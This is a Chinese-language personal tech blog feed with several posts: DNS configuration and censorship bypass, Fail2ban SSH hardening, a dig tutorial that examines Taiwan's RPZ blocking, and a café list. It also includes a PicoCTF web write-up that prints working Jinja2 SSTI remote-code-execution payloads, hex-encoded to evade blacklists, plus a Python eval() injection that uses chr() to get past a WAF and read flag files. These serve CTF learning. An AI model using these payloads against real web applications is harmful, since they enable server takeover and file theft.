    uv pip compile pyproject.toml -o requirements.txt
    git add requirements.txt
fi

注意事項

uv 目前還在快速發展中，某些功能可能還不夠穩定
如果遇到問題，可以查看官方文檔或中文文檔
建議在新專案中使用，舊專案遷移前請做好備份

總結

uv 是一個非常強大的 Python 工具，整合了眾多功能，並且速度極快。如果你：

受夠了 pip 的慢速度
想要嘗試看看更好的依賴管理
需要管理多個 Python 版本
想要一個統一的工具鏈

那麼 uv 絕對值得一試！

參考資料

如何更改電腦與手機的 DNS 設定？完整教學指南

CHIEN (qian) — Thu, 04 Dec 2025 00:00:00 GMT

什麼是 DNS？為什麼要更改它？

DNS（Domain Name System） 是網際網路的「電話簿」，負責將網址（如 google.com）轉換成 IP 位址。

DNS 也常被用作網路審查工具。透過 DNS 污染、RPZ (Response Policy Zone) 等技術，政府或 ISP 可以封鎖特定網站。最近的例子就是台灣政府封鎖小紅書。這種手法也是中國**網路長城（GFW）**的手段之一，不過 GFW 還結合了 IP 封鎖、深度封包檢測（DPI）等更複雜的技術。

更改 DNS 的好處

提升網路速度：某些 DNS 伺服器回應更快
增強安全性：防止釣魚網站和惡意軟體
改善隱私：避免 ISP 追蹤瀏覽記錄
繞過網路限制：訪問被封鎖的網站（如小紅書）

:::important 更改為國際公共 DNS(如 Google 8.8.8.8 或 Cloudflare 1.1.1.1)可繞過 DNS 封鎖,但請注意可能涉及法律問題,使用前請自行評估風險。 :::

DNS 提供商	主要 DNS	備用 DNS	特色
Google	`8.8.8.8`	`8.8.4.4`	速度快、穩定性高、全球覆蓋
Cloudflare	`1.1.1.1`	`1.0.0.1`	注重隱私、速度最快
Quad9	`9.9.9.9`	`149.112.112.112`	主打安全性

電腦端設定

:::tip 最快方法：想快速繞過 DNS 封鎖（如小紅書），建議先試「方法一：瀏覽器設定」，幾秒鐘就能完成！ :::

方法一：瀏覽器設定（最簡單）

現代瀏覽器內建安全 DNS（DoH）功能，最快速且不影響系統。

Chrome / Edge / Brave

點選右上角 ⋮ > 「設定」> 「隱私權和安全性」> 「安全性」
啟用「使用安全 DNS」，選擇 Google Public DNS 或 Cloudflare
立即生效，無需重啟

Firefox

點選 ☰ > 「設定」> 「隱私權與安全性」
勾選「啟用 DNS over HTTPS」
選擇 Cloudflare 或 Google

:::note 優點：只影響瀏覽器，適合快速測試
限制：其他應用程式仍使用系統 DNS :::

方法二：Windows 系統設定

圖形介面

按 Win + I > 「網路和網際網路」> 「進階網路設定」> 「變更介面卡選項」
在網路連線上按右鍵 > 「內容」
雙擊「網際網路通訊協定第 4 版 (TCP/IPv4)」
選擇「使用下列的 DNS 伺服器位址」
- 慣用：8.8.8.8
- 其他：8.8.4.4
點選「確定」

PowerShell（進階）

# 以系統管理員身分執行
Set-DnsClientServerAddress -InterfaceAlias "Wi-Fi" -ServerAddresses ("8.8.8.8","8.8.4.4")

方法三：macOS 系統設定

Apple 選單 > 「系統設定」> 「網路」
選擇連線 > 「詳細資料」> 「DNS」
點選 + 新增 DNS：8.8.8.8 和 8.8.4.4
點選「好」> 「套用」

終端機方式：

sudo networksetup -setdnsservers Wi-Fi 8.8.8.8 8.8.4.4

手機端設定

iOS

「設定」> 「Wi-Fi」> 點選網路旁的 ⓘ
「設定 DNS」> 選擇「手動」
刪除現有 DNS，新增 8.8.8.8 和 8.8.4.4
點選「儲存」

:::tip 推薦安裝 Google 或 Cloudflare 的 App (如 1.1.1.1) 啟用加密 DNS :::

Android

私人 DNS（推薦，Android 9+）

「設定」> 「網路和網際網路」> 「私人 DNS」
選擇「私人 DNS 提供者主機名稱」
輸入：
- Cloudflare：1dot1dot1dot1.cloudflare-dns.com
- Google：dns.google
點選「儲存」

:::important 私人 DNS 使用 DoT 協定，提供更好的隱私保護 :::

Wi-Fi 設定

長按 Wi-Fi 網路 > 「修改網路」> 「進階選項」
IP 設定改為「靜態」
DNS 1：8.8.8.8，DNS 2：8.8.4.4

如何測試 DNS 是否生效？

線上檢測

命令列

# Windows/macOS/Linux
nslookup google.com

查看輸出中的「Server」欄位，應顯示你設定的 DNS。

常見問題 FAQ

Q1: 更改 DNS 會影響網路速度嗎？

可以稍微提升速度，但差異不明顯。最大好處是穩定性和安全性。

Q2: 我該選擇哪個 DNS？

一般使用者：Google (8.8.8.8) 或 Cloudflare (1.1.1.1)
注重隱私：Cloudflare (1.1.1.1)
注重安全：Quad9 (9.9.9.9)

Q3: 如何恢復預設設定？

將 DNS 改回「自動取得」或「DHCP」即可。

Q4: 什麼是 RPZ？台灣有封鎖網站嗎？

RPZ (Response Policy Zone) 是 DNS 層級的內容過濾技術。台灣自 2020 年起要求電信業者實施 RPZ，原意是防詐騙，但出現爭議：

🚫 某些網站僅憑公文就被封鎖
⚠️ 誤封事件：Instagram、小紅書等
📋 缺乏申訴管道

:::warning 更改 DNS 訪問被誤封的合法網站（如小紅書）是合理自保，但訪問明顯違法內容仍可能觸法。 :::

Q5: 更改 DNS 就能完全翻牆了嗎？

不完全是。DNS 封鎖只是網路審查的一種：

✅ DNS 封鎖：更改 DNS 可繞過（台灣 RPZ、中國 DNS 污染）
❌ IP 封鎖：需要 VPN
❌ 深度封包檢測（DPI）：需要 VPN

中國的 GFW 同時使用三種技術，單純更改 DNS 無法突破。但台灣目前僅 DNS 層級封鎖，更改 DNS 就足夠。

結語

更改 DNS 是簡單有效的網路優化方式，幾分鐘就能完成。無論是提升速度、安全性或隱私保護，都值得一試！

:::note 延伸閱讀：

Fail2ban SSH 防護完整使用教學：安裝、設定與參數詳解

CHIEN (qian) — Wed, 10 Dec 2025 00:00:00 GMT

簡介

Fail2ban 是一款強大的開源入侵防禦工具，專門用於保護 Linux 系統免受暴力破解攻擊。它透過即時監控系統日誌檔案，自動偵測異常登入行為，並將可疑的 IP 位址加入防火牆黑名單，有效提升伺服器的安全性。

對於暴露在公網上的 SSH 服務來說，Fail2ban 是不可或缺的第一道防線，能夠有效阻擋自動化的密碼暴力破解攻擊。

安裝 Fail2ban

Ubuntu / Debian 系統

使用 APT 套件管理器安裝 Fail2ban：

sudo apt-get update
sudo apt-get install fail2ban -y

安裝完成後，Fail2ban 服務會自動啟動。

基礎設定

主要設定檔案

Fail2ban 的主要設定檔位於 /etc/fail2ban 目錄下。核心設定檔為 /etc/fail2ban/fail2ban.conf。

重要提醒：為避免套件更新時覆蓋你的自訂設定，我們需要建立一個本地設定檔 /etc/fail2ban/fail2ban.local，所有修改都在此檔案中進行。

複製預設設定檔：

sudo cp /etc/fail2ban/fail2ban.conf /etc/fail2ban/fail2ban.local

設定開機自動啟動：

sudo systemctl enable fail2ban

設定日誌檔案位置

編輯 /etc/fail2ban/fail2ban.local，找到 [Definition] 區段，設定日誌檔案路徑：

[Definition]
logtarget = /var/log/fail2ban/fail2ban.log

修改完成後，需要手動建立日誌目錄並重啟服務（系統不會自動建立）：

sudo mkdir -p /var/log/fail2ban  # 建立日誌目錄
sudo service fail2ban restart    # 重啟服務

檢查服務狀態

重啟完成後，可以檢查 Fail2ban 服務是否正常運作：

sudo service fail2ban status

如果設定正確，你會看到類似以下的輸出：

● fail2ban.service - Fail2Ban Service
     Loaded: loaded (/usr/lib/systemd/system/fail2ban.service; enabled; preset: enabled)
    Drop-In: /run/systemd/system/service.d
             └─zzz-lxc-service.conf
     Active: active (running) since Wed 2025-12-10 13:14:12 CST; 3s ago
 Invocation: 5d78b37f2bc84ac891657d15c7014770
       Docs: man:fail2ban(1)
   Main PID: 4002 (fail2ban-server)
      Tasks: 5 (limit: 14406)
     Memory: 25M (peak: 25M)
        CPU: 66ms
     CGroup: /system.slice/fail2ban.service
             └─4002 /usr/bin/python3 /usr/bin/fail2ban-server -xf start

Dec 10 13:14:12 owo systemd[1]: Started fail2ban.service - Fail2Ban Service.
Dec 10 13:14:12 owo fail2ban-server[4002]: Server ready

Jail 監獄設定

什麼是 Jail？

jail.conf 是 Fail2ban 的核心封禁規則設定檔。Jail（監獄）定義了：

誰應該被抓：哪些行為屬於可疑或惡意？
怎麼處罰：封鎖多久？封鎖哪些端口？

建立本地 Jail 設定

同樣地，我們需要複製一份本地設定檔來避免被更新覆蓋：

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo vim /etc/fail2ban/jail.local

啟用 SSH 防護

在預設狀態下，Fail2ban 對所有服務都是停用的，因此我們需要手動啟用需要的服務。以下以 SSH 為例：

在 /etc/fail2ban/jail.local 中找到或新增以下區段：

[sshd]
enabled = true                    # 啟用 SSH 防護
filter = sshd                     # 使用 sshd 過濾器
maxretry = 3                      # 最大失敗嘗試次數
bantime = 600                     # 封鎖時長（秒）
port = 22                         # SSH 服務端口
logpath = %(sshd_log)s            # SSH 日誌檔案路徑
backend = %(sshd_backend)s        # 日誌讀取後端

設定說明：

enabled = true：啟用 SSH 監獄
filter = sshd：使用預定義的 sshd 過濾規則
maxretry = 3：允許失敗 3 次後封鎖
bantime = 600：封鎖 10 分鐘（600 秒）
port = 22：監控 SSH 預設端口

修改完成後重啟服務：

sudo service fail2ban restart

實戰測試

模擬攻擊

使用另一台機器嘗試 SSH 登入，並故意輸入錯誤密碼 3 次以上。你會發現第 4 次嘗試時會出現以下錯誤訊息：

ssh: connect to host 192.168.139.231 port 22: Connection refused

這表示你的 IP 已經被 Fail2ban 成功封鎖。

檢查封鎖狀態

使用 fail2ban-client 工具檢查當前的封鎖狀態：

sudo fail2ban-client status sshd

你會看到類似以下的輸出，顯示被封鎖的 IP 以及統計資訊：

Status for the jail: sshd
|- Filter
|  |- Currently failed:	0
|  |- Total failed:	0
|  `- Journal matches:	_SYSTEMD_UNIT=ssh.service + _COMM=sshd
`- Actions
   |- Currently banned:	1
   |- Total banned:	1
   `- Banned IP list:	192.168.139.108

常用參數詳解

以下是 Fail2ban 最常用的參數說明，幫助你進行更精細的調整：

參數	說明	範例值	備註與建議
`ignoreip`	IP 白名單。Fail2ban 絕對不會封鎖這些 IP。請務必將管理用 IP、內部網路 IP 加入，避免誤鎖自己。	`127.0.0.1/8 192.168.1.5`	支援 CIDR 格式（如 `/24`），多個 IP 用空白分隔
`bantime`	封鎖時長。被偵測到的 IP 將被封鎖多久。	`1h`（1小時）<br>`1d`（1天）<br>`-1`（永久）	預設為 10 分鐘，建議至少設定為 `1h` 或更長
`findtime`	觀察時間窗口。在多久的時間內累積失敗次數。與 `maxretry` 配合使用。	`10m`（10分鐘）<br>`1d`（24小時）	設為 10m 表示攻擊者須在 10 分鐘內連續失敗才會被封鎖，超過時間則計數歸零
`maxretry`	最大容忍失敗次數。在 `findtime` 期間內允許失敗幾次。	`3`（嚴格）<br>`5`（預設）	SSH 建議設為 `3`；網頁應用可能誤觸，建議設 `5` 或更多
`enabled`	啟用開關。是否啟用該 Jail。	`true` 或 `false`	除了 `[DEFAULT]` 外，所有 Jail 預設為 `false`，需手動啟用
`port`	監控端口。指定要封鎖哪個端口的連線。	`ssh`<br>`http,https`<br>`8080`	可使用服務名稱（由 `/etc/services` 解析）或直接使用端口號
`logpath`	日誌檔案路徑。Fail2ban 讀取哪個日誌檔案來偵測攻擊。	`/var/log/auth.log`<br>`/var/log/nginx/error.log`	最常設錯的地方。必須指向服務實際寫入的日誌位置
`backend`	日誌讀取模式。指定如何讀取日誌。	`systemd`<br>`auto`	現代 Linux（Ubuntu 20+, CentOS 7+）建議 SSH 使用 `systemd`，傳統日誌檔使用 `auto` 或 `polling`
`banaction`	封鎖動作。指定使用哪個防火牆工具執行封鎖。	`iptables-multiport`<br>`ufw`<br>`nftables-multiport`	必須配合系統安裝的防火牆工具

一些花式用法

:::info 之後補上 :::

PicoCTF Web Exploitation Medium 分級解題紀錄

CHIEN (qian) — Wed, 24 Dec 2025 00:00:00 GMT

Introduction

這裡放的是一些解題紀錄。如果某題沒有出現在這裡，只有兩種可能：一是我已經解過了，二是我還沒解到。

SSTI2

Description

SSTI（Server-Side Template Injection）是一種安全漏洞，發生在應用程式將使用者輸入直接嵌入伺服器端模板引擎（如 Jinja2、Twig、Smarty）中解析時。攻擊者可以利用模板語法注入惡意指令，進而讀取敏感檔案、洩漏伺服器資訊，甚至達成遠端程式碼執行（RCE）。

解法

1. 觀察網頁與漏洞偵測

觀察網站後會發現有一個輸入框，先試試輸入 {{7*7}} 看看回應。

結果頁面顯示了 49，確認伺服器存在 SSTI 漏洞，且使用的是 Jinja2 模板引擎。

接著嘗試標準的 RCE payload：

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

結果頁面回傳了 Stop trying to break me >:(，代表後端有做過濾。

2. 測試過濾規則

為了釐清哪些東西被擋，逐一測試了幾個關鍵字與符號：

{{config}}：OK（回傳 Flask Config）
{{request}}：OK（回傳 Request 物件）
{{lipsum}}：OK（回傳內建函數物件）
.（點號）與 _（底線）：在特定關鍵字組合下會被攔截。

題目給了一個 Hint：「Why is blacklisting characters a bad idea?」

這暗示黑名單無法完全封鎖所有路徑，可以利用 Jinja2 的特性來繞過字串檢查。

3. 構造繞過 Payload（十六進制編碼）

既然點號和特定關鍵字（如 __globals__、os、popen）被擋了，改用以下策略：

使用 |attr() 過濾器取代點號存取。
將所有敏感字串（屬性名稱與指令）全部轉換為十六進制（Hex Encoding）。

先嘗試列出目錄下的檔案（ls）：

{{ request|attr('\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e')|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')|attr('\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f')('\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f')|attr('\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f')('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f')('\x6f\x73')|attr('\x70\x6f\x70\x65\x6e')('\x6c\x73')|attr('\x72\x65\x61\x64')() }}

輸出結果： __pycache__ app.py flag requirements.txt

目錄下確實有一個名為 flag 的檔案。

4. Flag

確認檔案名稱後，將 ls 的十六進制（\x6c\x73）替換為 cat flag（\x63\x61\x74\x20\x66\x6c\x61\x67）：

最終 Payload：

{{ request|attr('\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e')|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')|attr('\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f')('\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f')|attr('\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f')('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f')('\x6f\x73')|attr('\x70\x6f\x70\x65\x6e')('\x63\x61\x74\x20\x66\x6c\x61\x67')|attr('\x72\x65\x61\x64')() }}

Flag： picoCTF{日本利用壓電瓷磚將腳步轉化為電能。}

3v@l

Description

eval() 是很多程式語言都有的內建函數（Python、JavaScript、PHP 都有），簡單來說就是把一段字串當程式碼跑。像這樣：

eval("2 + 2")  # 回傳 4

聽起來很方便對吧？但如果使用者的輸入被直接丟進 eval()，那攻擊者就能注入任意程式碼，直接在伺服器上為所欲為（RCE）。

這題的網站用 Python Flask 寫的，後端拿 eval() 來算數學。雖然有用正則表達式做了一層 WAF 來擋危險的關鍵字跟指令，但嘛... 題目名稱都叫 3v@l 了，擺明就是要你繞過去。

解法

1. 先確認漏洞

看到題目名稱就知道八九不離十了。先在輸入框試幾個簡單的：

輸入 pow(2, 10) 得到 1024，輸入 len("hello") 得到 5。

好，確認後端真的直接把輸入丟進 eval() 跑。

2. 試著 RCE，然後撞牆

既然是 Python，直覺就是用 os.popen 來跑系統指令：

__import__('os').popen('ls').read()

結果噴了：Error: Detected forbidden keyword 'os'.

有黑名單。那試試字串拼接繞過：

__import__('o'+'s').popen('l'+'s').read()

又噴了：Error: Detected forbidden keyword 'ls'.

所以過濾器會掃整段輸入，只要出現 os、ls 這些關鍵字就直接擋。

3. 偷看原始碼

既然拼接能過一部分，先試著讀 app.py 看看完整的過濾規則。

open('app.py').read() 被擋，改用拼接：

open('ap'+'p.py').read()

成功拿到原始碼！讓我們來看看：

BLOCKLIST_KEYWORDS：os、eval、ls、cat、shell 等一堆關鍵字
FILE_PATH_REGEX：[\\\/] 擋斜線，\.[A-Za-z0-9]{1,3}\b 擋副檔名（像 .py、.txt）

4. 用 chr() 繞過正則

從前面的測試知道根目錄有個 flag.txt，但 WAF 擋了 / 跟 .txt，不能直接寫路徑。

那就用 chr() 把被禁的符號拼出來：

/ = chr(47)
. = chr(46)

順帶一提，.read() 不會被正則抓到，因為 read 是 4 個字元，而正則只擋 1~3 碼的副檔名。

5. 最終 Payload

open(chr(47) + 'flag' + chr(46) + 'txt').read()

Flag： picoCTF{這些瓷磚能捕捉你腳步產生的動能。}

dig 指令完整教學：DNS 查詢、範例與故障排除

CHIEN (qian) — Wed, 18 Mar 2026 00:00:00 GMT

什麼是 dig？

dig 是 Domain Information Groper 的縮寫，是非常經典的 DNS 查詢工具。當你想知道某個網域目前解析到哪個 IP、MX 記錄有沒有設對、TXT 驗證字串是否生效，或是某台 DNS 伺服器回了什麼內容時，dig 幾乎都是第一個該拿出來的工具。

跟 nslookup 比起來，dig 的輸出更完整、結構更清楚，也更適合除錯與自動化腳本使用。

如果你平常會碰到以下情境，建議一定要熟：

網站剛切換 DNS，想確認解析是否正確
信箱收不到信，想檢查 MX 記錄
網域驗證失敗，想檢查 TXT 記錄
想比對不同 DNS 伺服器的查詢結果
想知道問題出在遞迴 DNS、授權 DNS 還是快取

dig 可以用來做什麼？

dig 最常見的用途包括：

查詢 A / AAAA / MX / TXT / NS / SOA / CNAME 等 DNS 記錄
指定特定 DNS 伺服器查詢，例如 1.1.1.1 或 8.8.8.8
觀察 TTL、Authority、Additional Section 等細節
追查 DNS 委派路徑
進行反向 DNS 查詢（PTR）
檢查 DNSSEC、TCP 查詢與 trace 結果

dig 安裝方式

Debian / Ubuntu

sudo apt update
sudo apt install dnsutils -y

RHEL / Rocky / AlmaLinux / CentOS

sudo dnf install bind-utils -y

macOS

macOS 通常已內建 dig，可直接確認：

dig -v

如果沒有，通常可透過安裝 BIND 工具或其他套件管理方式補齊，但大多數情況下系統本身就能使用。

dig 基本語法

dig [@DNS伺服器] 網域 [查詢類型] [選項]

最常見的幾種形式：

# 查詢網域的預設記錄（通常是 A）
dig google.com

# 指定查詢類型
dig google.com AAAA

# 指定 DNS 伺服器
dig @1.1.1.1 google.com

# 指定 DNS 伺服器與查詢類型
dig @8.8.8.8 google.com MX

先看懂 dig 輸出

先執行一個最基本的例子：

dig cloudflare.com

你通常會看到類似這樣的輸出：

; <<>> DiG 9.10.6 <<>> cloudflare.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32617
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cloudflare.com.                        IN      A

;; ANSWER SECTION:
cloudflare.com.         192     IN      A       104.16.132.229
cloudflare.com.         192     IN      A       104.16.133.229

;; Query time: 86 msec
;; SERVER: fe80::a4c3:37ff:fe5b:8364%11#53(fe80::a4c3:37ff:fe5b:8364%11)
;; WHEN: Wed Mar 18 14:10:37 CST 2026
;; MSG SIZE  rcvd: 75

重點看這幾個欄位：

status: NOERROR：查詢成功
ANSWER SECTION：真正查到的答案
300：TTL，代表快取存活秒數
SERVER：這次是問哪台 DNS 伺服器
Query time：查詢耗時

常見狀態碼

NOERROR：成功查到資料
NXDOMAIN：這個網域不存在
SERVFAIL：DNS 伺服器查詢失敗
REFUSED：伺服器拒絕回應

最常用的查詢範例

查 A 記錄

查 IPv4 位址：

dig example.com A

查 AAAA 記錄

查 IPv6 位址：

dig example.com AAAA

查 MX 記錄

查郵件交換伺服器：

dig example.com MX

如果你在排查寄信問題，這是必查項目。

查 TXT 記錄

查 SPF、DKIM、網域驗證資訊：

dig example.com TXT

也很常用在：

Google Search Console 驗證
SSL 憑證 DNS 驗證
郵件 SPF / DKIM / DMARC 檢查

查 NS 記錄

查詢這個網域使用哪些名稱伺服器：

dig example.com NS

查 SOA 記錄

看授權區域的重要資訊，例如序號與主要 DNS：

dig example.com SOA

如果你懷疑 zone 檔沒更新，SOA serial 常常是第一個觀察點。

查 CNAME 記錄

dig www.example.com CNAME

查任意常見記錄

dig example.com ANY

不過要注意，很多 DNS 伺服器已經限制或不再完整支援 ANY 查詢，因此這個結果不一定可靠。

指定 DNS 伺服器查詢

有時候問題不在網域本身，而是在你問的是哪台 DNS。

例如你想直接問 Cloudflare：

dig @1.1.1.1 example.com

直接問 Google Public DNS：

dig @8.8.8.8 example.com

也可以直接問權威 DNS：

dig @ns1.example.com example.com A

這在以下情境非常實用：

比對不同公共 DNS 的回應
確認權威 DNS 是否已更新
排查本機 DNS 快取或 ISP DNS 汙染

讓輸出更精簡

只看答案

dig example.com +short

這是平常最常用的寫法之一，特別適合 shell script。

例如：

dig example.com A +short
dig example.com AAAA +short
dig example.com MX +short

只顯示 Answer Section

dig example.com +noall +answer

這比完整輸出乾淨很多，又比 +short 保留更多資訊。

顯示統計資訊

dig example.com +stats

不做額外解釋

dig example.com +nocmd +noquestion +nocomments +nostats

如果你在寫腳本，這些選項很實用。

反向 DNS 查詢（PTR）

如果你想知道某個 IP 對應到哪個主機名稱，可以用 -x：

dig -x 8.8.8.8

精簡顯示：

dig -x 8.8.8.8 +short

這很適合拿來檢查：

郵件伺服器反解是否正確
某個 IP 是否有設定 PTR
記錄是否對得上主機名稱

追查 DNS 委派路徑

使用 `+trace`

dig example.com +trace

這個選項會從根 DNS 開始，一路追到最終權威 DNS，非常適合排查：

委派是否正確
某層 NS 是否有問題
為什麼某個公共 DNS 查得到，但某些地方查不到

如果你想理解網域解析是怎麼一路被找到的，+trace 非常值得多玩幾次。

強制使用 TCP 查詢

DNS 預設通常走 UDP，但有些情境會需要 TCP，例如：

回應太大
DNSSEC 資料較多
某些防火牆或設備對 UDP 行為特殊

可用 +tcp：

dig example.com +tcp

查 DNSSEC 資訊

如果你想看 DNSSEC 相關資訊，可以加上 +dnssec：

dig example.com DNSKEY +dnssec

或：

dig example.com DS +dnssec

這通常比較偏進階排查，但如果你有做 DNSSEC、RPKI、網域安全相關主題，這會很有用。

實用排查情境

1. 網站剛改 A 記錄，想確認有沒有生效

dig example.com A +short

如果結果不是你預期的新 IP，可以再比對不同 DNS：

dig @1.1.1.1 example.com A +short
dig @8.8.8.8 example.com A +short

如果權威 DNS 正確、公共 DNS 還沒更新，多半是快取還沒過 TTL。

2. 子網域無法開站，懷疑 CNAME 設錯

dig blog.example.com CNAME +noall +answer

如果沒有答案，就代表可能根本沒設，或設成了別的記錄型態。

3. 信件收不到，檢查 MX 與 SPF

dig example.com MX +noall +answer
dig example.com TXT +noall +answer

你可以確認：

MX 是否指向正確郵件主機
SPF 記錄有沒有拼錯
驗證用 TXT 是否真的存在

4. 想確認目前問到哪台 DNS 伺服器

dig example.com

直接看輸出中的 SERVER 欄位即可。

5. 懷疑授權 DNS 沒更新

dig example.com SOA +noall +answer

檢查 SOA serial 有沒有增加，是非常常見的排查方式。

RPZ 實例：小紅書被導向到異常 IP

在台灣網路環境裡，dig 也很適合拿來觀察 RPZ（Response Policy Zone） 類型的 DNS 封鎖。

例如查詢 www.xiaohongshu.com：

dig www.xiaohongshu.com

範例輸出：

; <<>> DiG 9.10.6 <<>> www.xiaohongshu.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24336
;; flags: qr rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.xiaohongshu.com.           IN      A

;; ANSWER SECTION:
www.xiaohongshu.com.    277     IN      A       140.111.246.32

;; Query time: 23 msec
;; SERVER: fe80::a4c3:37ff:fe5b:8364%11#53(fe80::a4c3:37ff:fe5b:8364%11)
;; WHEN: Wed Mar 18 14:21:02 CST 2026
;; MSG SIZE  rcvd: 64

這時候如果你看到 www.xiaohongshu.com 被解析到 140.111.246.32，就很值得懷疑了。因為這個 IP 看起來不像小紅書正常會用的對外服務位址。

如果你直接指定某些 ISP 的遞迴 DNS，還可能會看到更明顯的 RPZ 痕跡。例如直接查中華電信：

dig @dns.hinet.net www.xiaohongshu.com

可能會出現像這樣的結果：

; <<>> DiG 9.10.6 <<>> @dns.hinet.net www.xiaohongshu.com
; (4 servers found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61890
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;www.xiaohongshu.com.           IN      A

;; ANSWER SECTION:
www.xiaohongshu.com.    300     IN      A       140.111.246.32

;; ADDITIONAL SECTION:
rpztw.                  60      IN      SOA     localhost. This.is.an.infringing.website.rpztw. 1773812402 60 60 86400 60

;; Query time: 47 msec
;; SERVER: 2001:b000:168::1#53(2001:b000:168::1)
;; WHEN: Wed Mar 18 14:26:11 CST 2026
;; MSG SIZE  rcvd: 149

這裡最值得注意的是 ADDITIONAL SECTION 裡面的：

This.is.an.infringing.website.rpztw.

這種字樣幾乎就是在直接告訴你：

這不是單純的正常遞迴解析結果
解析器背後有一個名為 rpztw 的政策區
這筆回答是依據政策規則被改寫後送回來的

換句話說，如果你除了看到異常 IP，還看到像 This.is.an.infringing.website.rpztw. 這種字串，那就更能說明這是一筆 明確帶有 RPZ 痕跡 的 DNS 回覆。

接著可以再查這個 IP 是誰的：

whois 140.111.246.32

查詢結果可看到這段關鍵資訊：

inetnum:        140.109.0.0 - 140.111.255.255
netname:        TANET-BNETS
descr:          imported inetnum object for MOEC
country:        TW

從這個結果可以知道，140.111.246.32 落在台灣教育網路 / 教育體系相關的位址範圍，而不是小紅書原本應該出現的服務網段。這種情況通常就是很典型的訊號：

查詢本身成功，status 是 NOERROR
但答案不是該網站正常的服務 IP
回答被導向到特定政策或封鎖用途的位址

這就是判斷 疑似被 RPZ 或 DNS 政策導向 很實用的方法之一。

怎麼做交叉驗證？

你可以再指定其他公共 DNS 伺服器比對：

dig @1.1.1.1 www.xiaohongshu.com A +short
dig @8.8.8.8 www.xiaohongshu.com A +short

如果：

本機 / ISP DNS 查到的是 140.111.246.32
但其他公共 DNS 查到的是不同結果

那幾乎就能合理懷疑是本地 DNS 政策、RPZ 或攔截機制造成，而不是網站本身的正式解析結果。

:::important 只看單一次 dig 結果不能百分之百斷定所有封鎖機制，但若結合 異常 IP、whois 所屬資訊、不同 DNS 比對結果，通常已經足以判斷這不是正常網站解析。 :::

dig 與 nslookup 差在哪？

兩者都能查 DNS，但在實務上我會更推薦 dig：

dig 輸出更完整
dig 更適合做除錯
dig 更容易搭配 +short、+trace、+tcp 等選項
dig 在 Linux / DevOps / 維運場景更常見

如果只是偶爾查一下 DNS，nslookup 也能用；但如果要真的看懂 DNS 問題，dig 明顯更好用。

常見錯誤與排查方向

查不到資料，但網域明明存在

先確認查詢類型是不是對的：

dig example.com A
dig example.com AAAA
dig example.com MX

有時候不是查不到，而是你查錯型態。

不同地點查到不同結果

通常可能是：

DNS 快取還沒過期
問到不同遞迴 DNS
權威 DNS 還沒同步
有地理位置導向或 DNS 汙染

建議直接指定 DNS 比對：

dig @1.1.1.1 example.com
dig @8.8.8.8 example.com
dig @9.9.9.9 example.com

`SERVFAIL`

常見原因：

權威 DNS 有問題
DNSSEC 設定錯誤
上游伺服器異常
區域資料不完整

這時候很適合搭配：

dig example.com +trace
dig example.com SOA
dig example.com DNSKEY +dnssec

`NXDOMAIN`

這代表這個名稱不存在。常見原因：

網域打錯
子網域尚未建立
zone 檔尚未套用

我最常用的 dig 指令清單

看目前 A 記錄

dig example.com A +short

查 TXT 驗證記錄

dig example.com TXT +noall +answer

查 MX

dig example.com MX +noall +answer

問指定 DNS

dig @1.1.1.1 example.com +short

反解 IP

dig -x 1.1.1.1 +short

追查整條委派

dig example.com +trace

結語

dig 是 DNS 排查幾乎必學的基本功。你不需要一開始就把所有選項背起來，只要先熟這幾個就很夠用：

A / AAAA
MX / TXT / NS / SOA
@DNS伺服器
+short
+noall +answer
-x
+trace

把這些用熟之後，遇到大多數 DNS 問題，你都能比以前更快定位到底是哪一層出錯。

:::note 延伸閱讀：

台北咖啡廳推薦｜適合工作、聊天的不限時咖啡廳整理

CHIEN (qian) — Mon, 13 Apr 2026 00:00:00 GMT

:::tip 以下順序不分排名 :::

台北咖啡廳推薦

如果你正在找台北咖啡廳推薦，尤其是適合工作、聊天、放空，或臨時想找一間不限時咖啡廳待一下，這篇先整理我實際去過、覺得值得收進清單的店。

有時候到台北不知道要去哪裡，想找個可以做事、和朋友聊天，或安靜坐一下的地方，咖啡廳通常就是最方便的選擇。這篇會持續更新我跑過的台北咖啡廳，內容以交通便利度、是否不限時、是否有插座和 Wi-Fi 為主。

台北不限時咖啡廳整理

CAFE ACME mini

如果你想找一間交通方便、空間舒服的台北不限時咖啡廳，CAFE ACME mini 是目前我會願意再回訪的一間。

名稱：CAFE ACME mini
地址：104臺北市中山區松江路169號
Google Map 連結：CAFE ACME mini
最近地標：捷運行天宮站 1 號出口，步行約 5 分鐘。
不限時：是
有插座：是
有 Wi-Fi：是

